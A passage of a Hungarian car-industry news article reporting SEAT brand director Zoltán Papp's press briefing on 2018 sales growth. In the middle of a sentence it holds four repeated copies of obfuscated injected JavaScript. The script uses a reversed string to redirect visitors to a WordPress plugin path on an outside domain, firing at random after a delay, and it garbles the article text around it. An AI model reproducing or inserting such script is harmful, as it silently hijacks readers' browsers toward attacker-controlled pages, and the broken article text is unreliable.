„Nagyon jó most SEAT-márkaigazgatónak lenni” – így kezdte sajttájékoztatóját Papp Zoltán, a SEAT márkaigazgatója szerdán. A szakember beszédében kiemelte, hogy a márka most növekedési pályán van, azt követően, hogy olyan modellekkel indítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottak offenzívát, mint az Ateca, Ibiza, Arona. 2018 első hét hónapjában 342 ezer autót értékesített a márka, amely több mint 20 százalékos növekedés a tavalyi év azonos időszakához képest. Magyarországon ennél is impozánsabb a növekedés, hiszen hét hónap viszonylatában 40%-os, de augusztus végére elérik az 50%-os növekedést is. Mostanra a tavaly egész évben eladott darabszám elkelt. Ebben szerepe van, hogy idén kelt el a SEAT eddigi legnagyobb egyben eladott…
- Hirdetés -